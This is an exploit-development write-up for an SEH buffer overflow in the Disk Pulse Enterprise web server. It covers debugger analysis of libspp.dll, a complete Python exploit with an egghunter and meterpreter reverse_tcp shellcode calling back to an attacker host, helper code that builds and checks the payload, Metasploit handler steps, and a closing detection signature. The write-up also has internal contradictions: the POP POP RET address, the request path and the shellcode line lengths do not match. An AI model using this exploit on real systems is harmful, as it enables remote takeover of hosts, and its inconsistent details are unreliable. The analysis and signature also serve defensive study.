
How to perform vulnerability analysis of the Disk Pulse Enterprise Windows application

2025-04-09 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

This article shows how to analyze the buffer overflow in the Disk Pulse Enterprise Windows application: where the bug is, how it is triggered, and how the public exploit for it is built.

I. Brief introduction of the vulnerability

Disk Pulse Enterprise is a disk change monitoring product. It can be connected to and managed through a management port (9120) or through the web management interface on port 80. The HTTP handling lives in a dynamic link library, libspp.dll, and that is where the problem is. When POST data is processed there is no strict length check on the POST body, so copying it overflows the destination buffer. The copy eventually runs into invalid memory, which raises an access violation; exception handling then walks the SEH chain, whose handler pointer has been overwritten by the same overflow, so EIP is controlled and arbitrary code can be executed.

Software download link: https://www.exploit-db.com/apps/a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe

Vulnerability disclosure address: https://www.exploit-db.com/exploits/40452

II. Experimental environment

Windows 7 x86: target system

IDA Pro: static analysis tool

Immunity Debugger (with mona.py): debugger used for exploit development

WinDbg: debugger used for crash analysis

III. Vulnerability analysis

First a brief look at the POC. This is a classic SEH-based buffer overflow exploit: it overwrites the SEH record and uses an egghunter to reach the shellcode.

Overview of SEH

Structured Exception Handling (SEH) is the Windows mechanism for handling hardware and software exceptions. Anyone familiar with programming will know the corresponding language construct: it is usually written as a try/except (or try/catch) block. At runtime each frame's handler is recorded in a linked list of EXCEPTION_REGISTRATION_RECORD structures on the stack (a pointer to the next record, followed by a pointer to the handler), reachable from fs:[0]. A stack overflow that reaches one of these records replaces the handler pointer, and the next exception calls whatever address the attacker wrote there.

Overview of Egghunter

Put simply, an egghunter is a small piece of code that searches memory for a tag (the "egg") and then jumps to the code placed right after it. It is used when the buffer available at the point where execution is hijacked is too small to hold the shellcode: the shellcode is placed elsewhere, prefixed with the tag, and the hunter finds it.
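As an added illustration (not part of the original write-up, and not the exploit author's code), the following Python models the search that the 32-byte NtAccessCheckAndAuditAlarm egghunter performs: it walks memory, skips pages that a probe reports as unreadable, and looks for the egg written twice. The address space, the page contents and the scan limit are constructed here; the single copy of "w00t" inside the hunter's own code shows why the tag has to be doubled.

```python
PAGE_SIZE = 0x1000
EGG = b"w00t"
STATUS_ACCESS_VIOLATION = 0xC0000005  # the hunter only compares the low byte: cmp al, 5
SCAN_LIMIT = 0x00420000               # constructed: stop here instead of at 0xFFFFFFFF

# The real hunter; "w00t" appears once inside it (mov eax, 0x74303077).
HUNTER_CODE = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
               b"\xef\xb8" + EGG + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# Constructed address space: {base: bytes}. Anything not covered is unmapped.
MEMORY = {
    0x00401000: b"\x90" * 64 + HUNTER_CODE,              # where the hunter itself runs
    0x00412000: b"A" * 100 + EGG * 2 + b"\xcc" * 368,    # POST body: doubled egg + shellcode
}

def probe(memory, addr):
    """Stand-in for the NtAccessCheckAndAuditAlarm call: 0 when 8 bytes at addr are readable."""
    for base, data in memory.items():
        if base <= addr and addr + 8 <= base + len(data):
            return 0
    return STATUS_ACCESS_VIOLATION

def read8(memory, addr):
    """The two scasd reads: 8 bytes at addr (only called after a successful probe)."""
    for base, data in memory.items():
        if base <= addr and addr + 8 <= base + len(data):
            return data[addr - base:addr - base + 8]
    raise MemoryError(hex(addr))

def egghunt(memory, egg=EGG, start=0, limit=SCAN_LIMIT):
    """Return the address the hunter jumps to (right after the doubled egg), or None."""
    addr = start
    while addr < limit:
        if probe(memory, addr) & 0xFF == STATUS_ACCESS_VIOLATION & 0xFF:
            addr = (addr | (PAGE_SIZE - 1)) + 1   # or dx, 0xfff ; inc edx  -> next page
            continue
        if read8(memory, addr) == egg * 2:         # two scasd compares, both must match
            return addr + 2 * len(egg)             # jmp edi
        addr += 1                                  # inc edx: next byte of a readable page
    return None
```

The hunter page at 0x00401000 contains the egg once and is scanned first; the search only stops at 0x00412000 where the egg is doubled, so the hunter never jumps into itself. Pages between the two regions are skipped one page at a time, which is what keeps the real hunter from faulting on unmapped memory.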

First, let's analyze the POC.

#!/usr/bin/python3
import socket

target = ("192.168.46.160", 80)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.46.171 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
# Shellcode bytes as printed on the original page; regenerate with the command above for your own LHOST/LPORT.
buf = b""
buf += b"\xdb\xdf\xd9\x74\x24\xf4\x92\xa7\xae\xd7\x5b\x29"
buf += b"\xc9\xb1\x56\x31\x18\x83\xc3\x04\x03\x53\x86\x45"
buf += b"\x5b\x2b\x4e\x0b\xa4\xd4\x8e\x6c\x31\xbf\xac\x4a"
buf += b"\x31\xef\x1c\x18\x17\x03\xd6\x8c\x9a\x58\xa3"
buf += b"\x11\x10\x8a\x09\x8d\x20\x50\xd0\x6d\x19"
buf += b"\x9b\x25\x6f\x5e\xc6\xc4\x3d\x37\x8c\x7b\xd2\x3c\xd8"
buf += b"\x47\x59\x0e\xcc\xbe\xc6\xef\xfe\x10\x5d\xb6\x20"
buf += b"\x92\xb2\xc2\x68\x8c\xd7\xef\x23\x23\x9b\xb5\xe1"
buf += b"\x7a\x64\x19\xcc\xb3\x63\x08\x73\x48\x16\x60\x80"
buf += b"\xf5\x21\xb7\xfb\x21\xa7\x2c\x5b\xa1\x5f\x5a\x66"
buf += b"\xf9\x5a\x50\xc3\x8d\x05\x74\xd2\x42\x3e\x80\x5f\x65"
buf += b"\x91\x01\x1b\x42\x35\x4a\xff\xeb\x36\xae\x14\x6e"
buf += b"\x99\x0f\xb1\xe4\x37\x5b\xa6\x5f\xa8\xe1\x58\x9f"
buf += b"\xa6\x72\x2a\xad\x69\x29\xa4\x9d\xe2\xf7\x33\xe5"
buf += b"\x07\xeb\x1e\x65\xf6\x0c\x5e\xaf\x3d\x58\x0e\xc7\x94"
buf += b"\xe1\xc5\x17\x18\x34\x73\x12\x8e\x77\x2b\x0c\xe5\x10"
buf += b"\x29\x51\xe8\xbc\xa4\xb7\x5a\x6d\xe6\x67\x1b\xdd\x46"
buf += b"\xd8\xf3\x37\x49\xe3\x37\x80\x20\x8e\xd7\x7c\x18"
buf += b"\x27\x41\x25\xd2\xd6\x8e\xf0\x9e\xd9\x05\xf0\x5f\x97"
buf += b"\xed\x71\x4c\xc0\x89\x79\x8c\x11\x3c\x79\xe6\x15\x96"
buf += b"\x2e\x9e\x17\xcf\x18\x01\xe7\x3a\x17\xbb\x2d"
buf += b"\x3c\x2e\x29\x11\x2a\x4f\xbd\x91\x19\xd7\x91\xc2"
buf += b"\xfd\x83\xc2\xf7\x01\x1e\x77\xa4\x97\xa1\x21\x18\x3f"
buf += b"\xca\xcf\x47\x55\x30\xa2\x0b\x92\xce\x24\x3b"
buf += b"\xa6\xca\x74\xbb\x36\x74\xeb\x5e\x5a\x04\xae"
buf += b"\xbf\x71\x4d\xa6\x4a\x14\x3f\x57\x4a\x3d\xe1\xc9\x4b"
buf += b"\xb2\x3a\xfa\x36\xbb\xfb\xc6\xd5\xd9\xfc\xc6\xd9"
buf += b"\xdf\xc1\x10\xe0\x95\x04\xa1\x57\xa5\x84\x2c"
buf += b"\x3b\x9a\x01\x65"

# pop pop ret (the original comment says 1001A333; the bytes below encode 0x1001A366, section IV uses 0x1001A333)
nseh = b"\xeb\x0b\x90\x90"        # jmp short +0x0b: over the SEH pointer into the NOPs that follow
seh = b"\x66\xa3\x01\x10"
# standard 32-byte NtAccessCheckAndAuditAlarm egghunter, egg "w00t"
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil = b"POST /admin HTTP/1.1\r\n"
evil += b"Host: 192.168.46.160\r\n"
evil += b"User-Agent: Mozilla/5.0\r\n"
evil += b"Connection: close\r\n"
evil += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += b"Accept-Language: en-us,en;q=0.5\r\n"
evil += b"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += b"Keep-Alive: 300\r\n"
evil += b"Proxy-Connection: keep-alive\r\n"
evil += b"Content-Type: application/x-www-form-urlencoded\r\n"
evil += b"Content-Length: 21000\r\n\r\n"
evil += b"\x41" * 12292          # subtract/add so that nseh stays at the SEH offset when the shellcode length changes
evil += b"w00tw00t"              # the egg the hunter searches for, doubled
evil += b"\x90" * 20
evil += buf
evil += b"\x90" * 50
evil += b"\x42" * 1554
evil += nseh
evil += seh
evil += b"\x90" * 20
evil += egghunter
evil += b"\x90" * 7000
print("Sending evil buffer...")
s.sendall(evil)
print("Payload Sent!")
s.close()

Looking at how the attacker builds the HTTP request: it is a POST (the script as printed posts to /admin with Content-Length: 21000; the original disclosure uses /login, and as section V notes the path does not matter). The body is 12292 "\x41" bytes, then the 8-byte egg "w00tw00t", then 20 "\x90" NOP bytes, then buf (the shellcode), then 50 NOPs and 1554 "\x42" bytes. The number of "\x42" bytes is chosen so that 12292 + 8 + 20 + len(buf) + 50 + 1554 = 14292, the SEH offset found in section IV, which is why the comment says to add or subtract when the shellcode length changes. At that offset come nseh and seh, which overwrite the SEH record with a short jump and the address of a POP POP RET sequence; then 20 more NOPs, the egghunter, and 7000 bytes of NOP padding. When the exception fires, POP POP RET returns into nseh, the short jump lands in the NOPs after seh, and the egghunter scans memory for the doubled "w00t" tag and jumps to the shellcode placed right after it.
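The layout described above, as an added example (not the write-up's or the exploit author's code): it builds the POST body with the POC's structure and verifies the offsets before anything is sent, so the shellcode can be swapped without hand-counting filler. The SEH offset, egg, bad characters and POP POP RET address are the write-up's values; the shellcode is whatever the caller passes in (a placeholder of 0xCC bytes in the check below).

```python
SEH_OFFSET = 14292                         # offset of nSEH in the POST body (section IV)
EGG = b"w00t"
BAD_CHARS = b"\x00\x0a\x0d\x26"            # the bytes excluded with msfvenom -b
NSEH = b"\xeb\x0b\x90\x90"                 # jmp short +0x0b, then two NOPs as padding
POP_POP_RET = 0x1001A333                   # from !mona seh (section IV)
SEH = POP_POP_RET.to_bytes(4, "little")
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
             b"\xef\xb8" + EGG + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

def find_bad_chars(data, bad=BAD_CHARS):
    """(offset, byte) for every byte the HTTP parser would mangle or split on."""
    return [(i, b) for i, b in enumerate(data) if b in bad]

def build_body(shellcode, seh_offset=SEH_OFFSET):
    """Egg + shellcode first, then filler sized so that nSEH lands exactly at seh_offset."""
    front = b"A" * 12292 + EGG * 2 + b"\x90" * 20 + shellcode + b"\x90" * 50
    filler = seh_offset - len(front)
    if filler < 0:
        raise ValueError("shellcode too long: it would run past the SEH record")
    return front + b"B" * filler + NSEH + SEH + b"\x90" * 20 + EGGHUNTER + b"\x90" * 7000

def layout(body):
    """Offsets of each piece, recovered from the finished body (what mona would report)."""
    return {"egg": body.index(EGG * 2), "nseh": body.index(NSEH),
            "seh": body.index(SEH), "egghunter": body.index(EGGHUNTER)}

def jmp_short_target(body, at):
    """Decode the 2-byte short jump (EB rel8) at `at`; return the offset it lands on."""
    if body[at] != 0xEB:
        raise ValueError("no short jmp at nSEH")
    rel = int.from_bytes(body[at + 1:at + 2], "little", signed=True)
    return at + 2 + rel

def check(body, seh_offset=SEH_OFFSET):
    """Every condition the exploit relies on; raises on the first one that fails."""
    off = layout(body)
    if off["nseh"] != seh_offset:
        raise ValueError(f"nSEH at {off['nseh']}, expected {seh_offset}")
    target = jmp_short_target(body, off["nseh"])
    if not (off["seh"] + 4 <= target < off["egghunter"]):
        raise ValueError("short jmp does not land in the NOPs before the egghunter")
    bad = find_bad_chars(body)
    if bad:
        raise ValueError(f"bad characters at {bad[:5]}")
    return off

def build_request(host, path, body):
    """The POC's request with a Content-Length that matches the body actually sent."""
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body
```

The short jump is +0x0b because, at the moment POP POP RET returns into nseh, the 4 bytes of seh sit right after it; the jump skips them and the two padding NOPs and lands in the NOP sled in front of the egghunter. check() also catches the classic mistake of a regenerated shellcode that contains one of the excluded bytes.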

Next, use WinDbg to open the vulnerable version of the application.

Send the payload and trigger the vulnerability. Enter g to continue; the return address is overwritten. Use kb to view the call stack.

Here the GetNextString function of SCA_HttpParser in libspp.dll is being called; the program then enters SEH exception handling and, because the SEH handler has been overwritten, control is passed to the attacker's code.

Open IDA and analyze the code at 10092822. In libspp, the SCA_HttpParser class handles the HTTP-related operations; a function named ExtractPostData is responsible for processing the POST data. Set a breakpoint at the entry of this function; its address is 10092510.

Replace the send buffer entirely with the POC to trigger the vulnerability, as shown in the figure below:

Check how the parameters are passed: the POST data is passed in as the second parameter. Note that it is passed in in full, with no length limit.

Continue stepping through to the GetNextString function mentioned earlier.

This function does one thing: it splits its first parameter, the POST data, into parts for subsequent processing. Stepping through, you can see that after GetNextString is entered for the first time, the first field is split off.

The first call splits off the user name; GetNextString is then entered again to split the second string, and that call performs a series of copy operations.

This LOC block does the copying. The instruction at 10092822 is the key location that triggers the vulnerability: ESI is the start address of the destination buffer, EDX is the copy index (the length copied so far), and CL holds the byte being copied, so the copy proceeds one byte at a time with no check against the size of the destination.

Therefore, once the copied length exceeds the size of the allocated buffer, the copy writes to an invalid address.

Looking at the value of ESI + EDX, you can see that it already exceeds the allocated buffer; what follows is invalid memory.

Then look at the value of ECX.

CL is the low byte of ECX; one byte is copied per iteration. Because the write goes to an invalid address, an access violation is raised, SEH exception handling is invoked, and eventually the attacker's code is executed.

Finally, let's look at the pseudocode of the GetNextString function.

IV. Vulnerability exploitation

First send the POC to trigger the vulnerability; in Immunity Debugger, check the SEH chain and confirm that it has been overwritten.

Next we need to find the SEH offset.

Use the mona command to generate a 20000-byte pattern:

!mona pattern_create 20000

After running, the pattern can be found in pattern.txt under C:\log\FTPServer.

Restart the program, put the pattern into the script's buffer in place of the filler, and run it.

Use the mona command to find the SEH offset:

!mona findmsp

Check mona's console output and find the section that describes the SEH offset.

The offset is 14292.
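What !mona pattern_create and !mona findmsp do, as an added example (not code from the write-up or from mona.py): the Metasploit-style cyclic pattern, and the lookup that turns the DWORD shown in the debugger back into an offset. The pattern length (20000) and the offset (14292) are the write-up's; the DWORD value used in the check is simply the pattern bytes at that offset.

```python
import string

CHARSETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)
MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes before 4-byte windows start to repeat

def pattern_create(length):
    """Aa0Aa1Aa2... : every 4-byte window is unique within MAX_UNIQUE bytes."""
    if length > MAX_UNIQUE:
        raise ValueError(f"pattern longer than {MAX_UNIQUE} bytes is no longer unique")
    out = bytearray()
    for u in CHARSETS[0]:
        for l in CHARSETS[1]:
            for d in CHARSETS[2]:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)

def pattern_offset(pattern, value):
    """value: 4 bytes as seen in memory, or the DWORD the debugger shows (little-endian).
    Returns the offset of that window in the pattern, or None if it is not part of it."""
    if isinstance(value, int):
        value = value.to_bytes(4, "little")
    pos = pattern.find(value)
    return None if pos == -1 else pos

def seh_offsets(pattern_length, nseh_dword, seh_dword):
    """The two values an overwritten SEH record shows; findmsp reports the nSEH one.
    Returns (nseh_offset, seh_offset) and checks that the handler follows nSEH by 4."""
    pattern = pattern_create(pattern_length)
    nseh_off = pattern_offset(pattern, nseh_dword)
    seh_off = pattern_offset(pattern, seh_dword)
    if nseh_off is None or seh_off is None or seh_off != nseh_off + 4:
        raise ValueError("SEH record was not overwritten by a contiguous part of the pattern")
    return nseh_off, seh_off
```

With the pattern sent in place of the filler, the debugger shows the SEH record overwritten by two pattern DWORDs; feeding them to seh_offsets() gives 14292 for nSEH, which is exactly where the POC places nseh.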

Next, look for the address of a POP POP RET sequence.

Use !mona seh

Open the seh.txt log and pick the address of a code block containing a POP POP RET sequence. It must come from a module that mona reports as not compiled with SafeSEH and not rebased, otherwise the handler will be rejected or the address will not be stable.

Set the following in the exploit:

nseh = "\xEB\x0B\x90\x90"
seh = "\x33\xA3\x01\x10"    # 0x1001A333, POP POP RET

Use msfvenom to generate the shellcode; the command is as follows:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.46.171 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

When the shellcode in the POC is replaced, adjust the number of filler bytes that follow it according to the length of buf, so that nseh still lands at offset 14292.

Restart the program and open Metasploit.

Select the exploit/multi/handler module.

Enter the commands and set the parameters (payload, LHOST and LPORT must match the msfvenom command).

Send the POC to trigger the vulnerability; Metasploit receives the session. Enter shell to get a shell on the vulnerable host.

V. Characteristics of the exploit:

Request method: POST

Request path: /login

Vulnerability characteristics: POST + arbitrary path + Content-Length > 14292 + |eb| + any byte + |90 90|
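The characteristics above turned into a request-level check, as an added example (not from the write-up): it parses a raw HTTP request, applies the POST / Content-Length > 14292 / "eb ?? 90 90" rule, and reports where in the body the nSEH pattern was found. The sample requests are constructed here; the SEH offset is the write-up's value.

```python
import re

SEH_OFFSET = 14292
NSEH_SIG = re.compile(rb"\xeb.\x90\x90", re.DOTALL)   # short jmp + two NOPs, as written to nSEH

def parse_request(raw):
    """Split a raw request into (method, path, headers, body); headers keyed in lower case."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    parts = request_line.split(b" ")
    method = parts[0]
    path = parts[1] if len(parts) > 1 else b""
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def matches_exploit(raw):
    """Offset of the nSEH pattern in the body when the request looks like the Disk Pulse
    SEH overflow (POST, body longer than the SEH offset, eb ?? 90 90 present); else None."""
    method, _path, headers, body = parse_request(raw)
    if method != b"POST":
        return None
    try:
        declared = int(headers.get(b"content-length", b"0"))
    except ValueError:
        declared = 0
    if max(declared, len(body)) <= SEH_OFFSET:
        return None
    # Prefer a hit exactly at the SEH offset; fall back to anywhere in the body, since a
    # field prefix such as "username=" in front of the filler shifts the offset slightly.
    m = NSEH_SIG.match(body, SEH_OFFSET) or NSEH_SIG.search(body)
    return m.start() if m else None

def scan(requests):
    """(index, offset) for every request in a captured batch that matched."""
    hits = []
    for i, raw in enumerate(requests):
        off = matches_exploit(raw)
        if off is not None:
            hits.append((i, off))
    return hits

def post(path, body, declared=None):
    """Constructed sample request for testing the check."""
    length = len(body) if declared is None else declared
    head = b"POST " + path + b" HTTP/1.1\r\nHost: 192.168.46.160\r\n" \
           b"Content-Type: application/x-www-form-urlencoded\r\n" \
           b"Content-Length: " + str(length).encode() + b"\r\n\r\n"
    return head + body
```

Large benign POST bodies can contain the 4-byte sequence by chance, which is why the check reports the offset: a hit at or just after 14292 is the exploit, a hit elsewhere in a long binary upload deserves a second look before alerting.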

VI. Defense suggestions

Upgrade the application: apply the vendor's patch or download a new version. Run antivirus software on the host, and do not expose the management ports (80 and 9120) to untrusted networks.

Download address: https://www.diskpulse.com/downloads.html
